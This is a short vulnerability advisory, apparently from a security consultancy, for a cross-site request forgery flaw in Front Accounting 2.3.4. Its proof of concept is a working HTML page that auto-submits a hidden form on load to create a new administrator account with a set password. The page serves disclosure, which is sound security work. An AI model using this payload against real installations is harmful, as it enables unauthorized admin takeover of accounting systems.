Home
Consulting
Advisories
Software
Articles
Contact

Front Accounting 2.3.4 Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in Front Accounting 2.3.4 can be exploited to create a new admin.

Proof Of Concept

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml">
            <input type="hidden" name="user_id" value="new_admin" />
            <input type="hidden" name="password" value="Password1" />
            <input type="hidden" name="real_name" value="x" />
            <input type="hidden" name="phone" value="x" />
            <input type="hidden" name="email" value="x@x.com" />
            <input type="hidden" name="role_id" value="2" />
            <input type="hidden" name="language" value="C" />
            <input type="hidden" name="pos" value="1" />
            <input type="hidden" name="print_profile" value="" />
            <input type="hidden" name="rep_popup" value="1" />
            <input type="hidden" name="ADD_ITEM" value="Add new" />
            <input type="hidden" name="_focus" value="user_id" />
            <input type="hidden" name="_modified" value="0" />
        </form>
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC